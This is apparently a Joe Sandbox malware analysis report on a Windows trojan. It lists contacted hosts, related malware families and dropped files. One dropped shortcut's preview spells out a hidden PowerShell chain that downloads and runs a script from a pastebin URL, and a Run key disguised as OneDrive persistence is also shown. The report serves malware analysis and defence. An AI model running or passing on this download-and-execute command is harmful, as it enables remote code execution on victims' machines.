                                                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000006.00000002.2569213401.0000027680001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2576842522.0000022701FD1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2586069317.00000242B4271000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2479111424.000002789C171000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2742508128.00000223B7431000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2819493490.0000025E65945000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        unknown
                                                        http://pastebin.compowershell.exe, 00000006.00000002.2569213401.000002768162C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2576842522.00000227035FB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2586069317.00000242B58A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2479111424.000002789D79B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2742508128.00000223B7E8A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2742508128.00000223B7938000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2742508128.00000223B7EA6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2819493490.0000025E65E63000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2819493490.0000025E6631A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2819493490.0000025E66334000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          unknown
                                                          https://pastebin.compowershell.exe, 0000000D.00000002.2479111424.000002789D77A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2742508128.00000223B7E96000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2819493490.0000025E66324000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            unknown
                                                            • No. of IPs < 25%
                                                            • 25% < No. of IPs < 50%
                                                            • 50% < No. of IPs < 75%
                                                            • 75% < No. of IPs
                                                            IPDomainCountryFlagASNASN NameMalicious
                                                            162.159.136.232
                                                            discord.comUnited States
                                                            13335CLOUDFLARENETUStrue
                                                            104.20.4.235
                                                            pastebin.comUnited States
                                                            13335CLOUDFLARENETUStrue
                                                            172.67.19.24
                                                            unknownUnited States
                                                            13335CLOUDFLARENETUSfalse
                                                            185.199.109.133
                                                            raw.githubusercontent.comNetherlands
                                                            54113FASTLYUStrue
                                                            104.17.112.233
                                                            tinyurl.comUnited States
                                                            13335CLOUDFLARENETUSfalse
                                                            Joe Sandbox version:41.0.0 Charoite
                                                            Analysis ID:1534112
                                                            Start date and time:2024-10-15 15:58:54 +02:00
                                                            Joe Sandbox product:CloudBasic
                                                            Overall analysis duration:0h 6m 35s
                                                            Hypervisor based Inspection enabled:false
                                                            Report type:full
                                                            Cookbook file name:default.jbs
                                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                            Number of analysed new started processes analysed:29
                                                            Number of new started drivers analysed:0
                                                            Number of existing processes analysed:0
                                                            Number of existing drivers analysed:0
                                                            Number of injected processes analysed:0
                                                            Technologies:
                                                            • HCA enabled
                                                            • EGA enabled
                                                            • AMSI enabled
                                                            Analysis Mode:default
                                                            Analysis stop reason:Timeout
                                                            Sample name:HQsitBLlOv.dll
                                                            (renamed file extension from exe to dll, renamed because original name is a hash value)
                                                            Original Sample Name:2577c0f08d1d1ad4fb18d8c980b501e002160acffa306b2d8ab1af8614521ac4.exe
                                                            Detection:MAL
                                                            Classification:mal100.troj.evad.winDLL@39/19@5/5
                                                            EGA Information:
                                                            • Successful, ratio: 100%
                                                            HCA Information:
                                                            • Successful, ratio: 92%
                                                            • Number of executed functions: 10
                                                            • Number of non-executed functions: 23
                                                            • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                            • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, otelrules.afd.azureedge.net, ctldl.windowsupdate.com, azureedge-t-prod.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
                                                            • Not all processes where analyzed, report is missing behavior information
                                                            • VT rate limit hit for: HQsitBLlOv.dll
                                                            TimeTypeDescription
                                                            09:59:56API Interceptor987x Sleep call for process: powershell.exe modified
                                                            09:59:57API Interceptor1x Sleep call for process: loaddll64.exe modified
                                                            16:00:14AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run OneDrive File Sync "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"
                                                            16:00:22AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run OneDrive File Sync "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"
                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                            162.159.136.232S23UhdW5DH.exeGet hashmaliciousLummaC, Glupteba, SmokeLoader, Socks5Systemz, StealcBrowse
                                                            • discord.com/administrator/index.php
                                                            104.20.4.235OSLdZanXNc.exeGet hashmaliciousUnknownBrowse
                                                            • pastebin.com/raw/sA04Mwk2
                                                            gaber.ps1Get hashmaliciousUnknownBrowse
                                                            • pastebin.com/raw/sA04Mwk2
                                                            cr_asm_crypter.ps1Get hashmaliciousUnknownBrowse
                                                            • pastebin.com/raw/sA04Mwk2
                                                            sostener.vbsGet hashmaliciousNjratBrowse
                                                            • pastebin.com/raw/V9y5Q5vv
                                                            sostener.vbsGet hashmaliciousXWormBrowse
                                                            • pastebin.com/raw/V9y5Q5vv
                                                            envifa.vbsGet hashmaliciousRemcosBrowse
                                                            • pastebin.com/raw/V9y5Q5vv
                                                            New Voicemail Invoice 64746w .jsGet hashmaliciousWSHRATBrowse
                                                            • pastebin.com/raw/NsQ5qTHr
                                                            Invoice Payment N8977823.jsGet hashmaliciousWSHRATBrowse
                                                            • pastebin.com/raw/NsQ5qTHr
                                                            Pending_Invoice_Bank_Details_XLSX.jsGet hashmaliciousWSHRATBrowse
                                                            • pastebin.com/raw/NsQ5qTHr
                                                            Pending_Invoice_Bank_Details_kofce_.JS.jsGet hashmaliciousWSHRATBrowse
                                                            • pastebin.com/raw/NsQ5qTHr
                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                            discord.comLm9IJ4r9oO.exeGet hashmaliciousUnknownBrowse
                                                            • 162.159.138.232
                                                            cr_asm_hiddenz.ps1Get hashmaliciousAsyncRAT, XWormBrowse
                                                            • 162.159.138.232
                                                            OSLdZanXNc.exeGet hashmaliciousUnknownBrowse
                                                            • 162.159.138.232
                                                            BeginSync lnk.lnkGet hashmaliciousUnknownBrowse
                                                            • 162.159.137.232
                                                            gaber.ps1Get hashmaliciousUnknownBrowse
                                                            • 162.159.137.232
                                                            cr_asm_crypter.ps1Get hashmaliciousUnknownBrowse
                                                            • 162.159.135.232
                                                            steamcodegenerator.exeGet hashmaliciousUnknownBrowse
                                                            • 162.159.138.232
                                                            cr_asm.ps1Get hashmaliciousUnknownBrowse
                                                            • 162.159.138.232
                                                            Q1KaSJ8Fom.exeGet hashmaliciousUnknownBrowse
                                                            • 162.159.135.232
                                                            Q1KaSJ8Fom.exeGet hashmaliciousUnknownBrowse
                                                            • 162.159.136.232
                                                            tinyurl.comBeginSync lnk.lnkGet hashmaliciousUnknownBrowse
                                                            • 104.18.111.161
                                                            https://tinyurl.com/y9r5fvasGet hashmaliciousUnknownBrowse
                                                            • 104.17.112.233
                                                            https://tinyurl.com/5xa2ubd7Get hashmaliciousUnknownBrowse
                                                            • 104.17.112.233
                                                            SecuriteInfo.com.Trojan.GenericKD.74126573.27896.28845.dllGet hashmaliciousMetasploitBrowse
                                                            • 104.17.112.233
                                                            SecuriteInfo.com.Trojan.GenericKD.74126573.27896.28845.dllGet hashmaliciousMetasploitBrowse
                                                            • 104.17.112.233
                                                            SecuriteInfo.com.Win64.MalwareX-gen.11827.5130.dllGet hashmaliciousAsyncRAT, XWormBrowse
                                                            • 104.18.111.161
                                                            balcao242609.vbsGet hashmaliciousUnknownBrowse
                                                            • 104.18.111.161
                                                            https://ibafhfg.r.af.d.sendibt2.com/tr/cl/ei-iIasDUfhajlha_L_PYwmEV0TXG-pmymM0mqP6wJ8jqUBnRevpHf8umV1Cxk0P5A0G7qvQoF39O-oYwRH3RCdSdtx1Y0b_2sg_iXOax_tFc1XZBC3EPtztmZF7qOstNWb2r9nSAsjPU6qj2F8Gg64Ba0d6xBjSEwUcsnsTYaQjAxsh52QvEBY0E7yDJkW8hVMf4Z-UgTv6SrNDoDPMdYdSSvXdtLzPyBKNyGRyOKbA6kM2yCjc-39_2GjmQrGc8IG-6EqDH4Ly9S8KIsAGet hashmaliciousUnknownBrowse
                                                            • 104.17.112.233
                                                            http://tinyurl.com/fresn30d39dGet hashmaliciousUnknownBrowse
                                                            • 104.17.112.233
                                                            https://tinyurl.com/NDCEuropeGet hashmaliciousUnknownBrowse
                                                            • 104.18.111.161
                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                            CLOUDFLARENETUSLm9IJ4r9oO.exeGet hashmaliciousUnknownBrowse
                                                            • 162.159.138.232
                                                            gaber_pyld.ps1Get hashmaliciousAsyncRAT, XWormBrowse
                                                            • 172.67.19.24
                                                            cr_asm_hiddenz.ps1Get hashmaliciousAsyncRAT, XWormBrowse
                                                            • 162.159.138.232
                                                            OSLdZanXNc.exeGet hashmaliciousUnknownBrowse
                                                            • 162.159.138.232
                                                            BeginSync lnk.lnkGet hashmaliciousUnknownBrowse
                                                            • 104.18.111.161
                                                            gaber.ps1Get hashmaliciousUnknownBrowse
                                                            • 162.159.137.232
                                                            cr_asm_crypter.ps1Get hashmaliciousUnknownBrowse
                                                            • 162.159.135.232
                                                            steamcodegenerator.exeGet hashmaliciousUnknownBrowse
                                                            • 162.159.138.232
                                                            cr_asm.ps1Get hashmaliciousUnknownBrowse
                                                            • 162.159.138.232
                                                            HqvlYZC7Gf.exeGet hashmaliciousUnknownBrowse
                                                            • 104.27.206.92
                                                            CLOUDFLARENETUSLm9IJ4r9oO.exeGet hashmaliciousUnknownBrowse
                                                            • 162.159.138.232
                                                            gaber_pyld.ps1Get hashmaliciousAsyncRAT, XWormBrowse
                                                            • 172.67.19.24
                                                            cr_asm_hiddenz.ps1Get hashmaliciousAsyncRAT, XWormBrowse
                                                            • 162.159.138.232
                                                            OSLdZanXNc.exeGet hashmaliciousUnknownBrowse
                                                            • 162.159.138.232
                                                            BeginSync lnk.lnkGet hashmaliciousUnknownBrowse
                                                            • 104.18.111.161
                                                            gaber.ps1Get hashmaliciousUnknownBrowse
                                                            • 162.159.137.232
                                                            cr_asm_crypter.ps1Get hashmaliciousUnknownBrowse
                                                            • 162.159.135.232
                                                            steamcodegenerator.exeGet hashmaliciousUnknownBrowse
                                                            • 162.159.138.232
                                                            cr_asm.ps1Get hashmaliciousUnknownBrowse
                                                            • 162.159.138.232
                                                            HqvlYZC7Gf.exeGet hashmaliciousUnknownBrowse
                                                            • 104.27.206.92
                                                            CLOUDFLARENETUSLm9IJ4r9oO.exeGet hashmaliciousUnknownBrowse
                                                            • 162.159.138.232
                                                            gaber_pyld.ps1Get hashmaliciousAsyncRAT, XWormBrowse
                                                            • 172.67.19.24
                                                            cr_asm_hiddenz.ps1Get hashmaliciousAsyncRAT, XWormBrowse
                                                            • 162.159.138.232
                                                            OSLdZanXNc.exeGet hashmaliciousUnknownBrowse
                                                            • 162.159.138.232
                                                            BeginSync lnk.lnkGet hashmaliciousUnknownBrowse
                                                            • 104.18.111.161
                                                            gaber.ps1Get hashmaliciousUnknownBrowse
                                                            • 162.159.137.232
                                                            cr_asm_crypter.ps1Get hashmaliciousUnknownBrowse
                                                            • 162.159.135.232
                                                            steamcodegenerator.exeGet hashmaliciousUnknownBrowse
                                                            • 162.159.138.232
                                                            cr_asm.ps1Get hashmaliciousUnknownBrowse
                                                            • 162.159.138.232
                                                            HqvlYZC7Gf.exeGet hashmaliciousUnknownBrowse
                                                            • 104.27.206.92
                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                            3b5074b1b5d032e5620f69f9f700ff0eLm9IJ4r9oO.exeGet hashmaliciousUnknownBrowse
                                                            • 162.159.136.232
                                                            • 104.20.4.235
                                                            • 172.67.19.24
                                                            • 185.199.109.133
                                                            gaber_pyld.ps1Get hashmaliciousAsyncRAT, XWormBrowse
                                                            • 162.159.136.232
                                                            • 104.20.4.235
                                                            • 172.67.19.24
                                                            • 185.199.109.133
                                                            cr_asm_hiddenz.ps1Get hashmaliciousAsyncRAT, XWormBrowse
                                                            • 162.159.136.232
                                                            • 104.20.4.235
                                                            • 172.67.19.24
                                                            • 185.199.109.133
                                                            OSLdZanXNc.exeGet hashmaliciousUnknownBrowse
                                                            • 162.159.136.232
                                                            • 104.20.4.235
                                                            • 172.67.19.24
                                                            • 185.199.109.133
                                                            BeginSync lnk.lnkGet hashmaliciousUnknownBrowse
                                                            • 162.159.136.232
                                                            • 104.20.4.235
                                                            • 172.67.19.24
                                                            • 185.199.109.133
                                                            gaber.ps1Get hashmaliciousUnknownBrowse
                                                            • 162.159.136.232
                                                            • 104.20.4.235
                                                            • 172.67.19.24
                                                            • 185.199.109.133
                                                            cr_asm_crypter.ps1Get hashmaliciousUnknownBrowse
                                                            • 162.159.136.232
                                                            • 104.20.4.235
                                                            • 172.67.19.24
                                                            • 185.199.109.133
                                                            steamcodegenerator.exeGet hashmaliciousUnknownBrowse
                                                            • 162.159.136.232
                                                            • 104.20.4.235
                                                            • 172.67.19.24
                                                            • 185.199.109.133
                                                            cr_asm.ps1Get hashmaliciousUnknownBrowse
                                                            • 162.159.136.232
                                                            • 104.20.4.235
                                                            • 172.67.19.24
                                                            • 185.199.109.133
                                                            https://www.google.com.tw/url?q=3HOSozuuQiApLjODz3yh&rct=tTPSJ3J3wDFX0jkXyycT&sa=t&esrc=WSECxFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ9mfdQ6lDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2F%E2%80%8Bkartratraining.%E2%80%8Bco%C2%ADm%2Fcheckout%2Fchart%2Fgy87uy953g6gh8h55hx98uh/d2VzdG9uLmhpbnNvbkBhcmdvZ3JvdXB1cy5jb20=Get hashmaliciousHTMLPhisherBrowse
                                                            • 162.159.136.232
                                                            • 104.20.4.235
                                                            • 172.67.19.24
                                                            • 185.199.109.133
                                                            No context
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has command line arguments, Archive, ctime=Sat May 7 04:20:03 2022, mtime=Mon Sep 9 22:58:05 2024, atime=Sat May 7 04:20:03 2022, length=69632, window=hidenormalshowminimized
                                                            Category:dropped
                                                            Size (bytes):1728
                                                            Entropy (8bit):4.527272298423835
                                                            Encrypted:false
                                                            SSDEEP:24:8MBsCCbRKrzcAJBkr+/4MsPsiqxlD2uxmCnBuG4aVlilzXQaR3+hab/Ia7/OB+/q:8zD6JUUPx2uxFu+LozXv3KabINBY0
                                                            MD5:724AA21828AD912CB466E3B0A79F478B
                                                            SHA1:41B80A72CE8C2F1F54C1E595872D7ECD63D637CD
                                                            SHA-256:D675147502CF2CA50BC4EC9A0D95DED0A5A8861BEC3D24FCD9EDD3F4B5718E70
                                                            SHA-512:B88218356ABF805B4263B0960DC6D0FBEC47E2135FA74839449CA860F727D54A1014062C9E7DB0652E81C635C8C0C177B47326DADAF3AE34ED058FA085F1E98C
                                                            Malicious:true
                                                            Preview:L..................F.... ...|%h..a.........|%h..a..........................E....P.O. .:i.....+00.../C:\...................V.1......Y..0.Windows.@......T,*)Y................................W.i.n.d.o.w.s.....Z.1.....$Yh...System32..B......T,*)Y......L_.....................!.S.y.s.t.e.m.3.2.....f.2......T.* .forfiles.exe..J......T.*)Y.....A...........t..........t..f.o.r.f.i.l.e.s...e.x.e.......V...............4.......U...........`8......Windows.C:\Windows\System32\forfiles.exe..&.....\.....\.....\.W.i.n.d.o.w.s.\.S.y.s.t.e.m.3.2.\.f.o.r.f.i.l.e.s...e.x.e.../.p. .c.:.\.w.i.n.d.o.w.s.\.s.y.s.t.e.m.3.2. ./.m. .n.o.t.e.p.a.d...e.x.e. ./.c. .".p.o.w.e.r.s.h.e.l.l...e.x.e. .-.c.o.m.m.a.n.d. .p.o.w.e.r.s.h.e.l.l. .-.w.i.n.d.o.w.s.t.y.l.e. .h. .-.c.o.m.m.a.n.d. .'.s.a.l. .f.a.t.b.a.k.e. .c.a.l.c.;.s.a.l. .c.a.l.l.i.t. .i.E.x.;. .s.a.l. .$.e.n.v.:.o.s. .i.W.r.;. .c.a.l.l.i.T.(.W.I.N.D.O.W.S._.N.T. .p.a.s.t.e.b.i.n...c.o.m./.r.a.w./.s.A.0.4.M.w.k.2. .-.u.s.e.b.a.s.i.c.p.a.r.s.i.n.g.).'."..
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):11608
                                                            Entropy (8bit):4.890472898059848
                                                            Encrypted:false
                                                            SSDEEP:192:6xoe5qpOZxoe54ib4ZVsm5emdqVFn3eGOVpN6K3bkkjo5OgkjDt4iWN3yBGHVQ9R:9rib4ZmVoGIpN6KQkj2Fkjh4iUxsT6YP
                                                            MD5:8A4B02D8A977CB929C05D4BC2942C5A9
                                                            SHA1:F9A6426CAF2E8C64202E86B07F1A461056626BEA
                                                            SHA-256:624047EB773F90D76C34B708F48EA8F82CB0EC0FCF493CA2FA704FCDA7C4B715
                                                            SHA-512:38697525814CDED7B27D43A7B37198518E295F992ECB255394364EC02706443FB3298CBBAA57629CCF8DDBD26FD7CAAC44524C4411829147C339DD3901281AC2
                                                            Malicious:false
                                                            Preview:PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):64
                                                            Entropy (8bit):1.1940658735648508
                                                            Encrypted:false
                                                            SSDEEP:3:Nlllulh:NllU
                                                            MD5:C0BA4C347376EA0710D14593DF2771A6
                                                            SHA1:E6CB3860B9996441DD6479E03A53AFA56BD41FD5
                                                            SHA-256:7C62030CA3A315840A545F0148E9434369BE0529B79B293A8EB57D96E2129D80
                                                            SHA-512:F05B8E12221A87A94E6240557885C29DCCE468C47B28E14D76DDA4B6AD30AADB2CD847912ED45C463B5CE9969588D77B56710B4E1E0FC6FD382238DA82024CAF
                                                            Malicious:false
                                                            Preview:@...e...............................R.O..............@..........
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
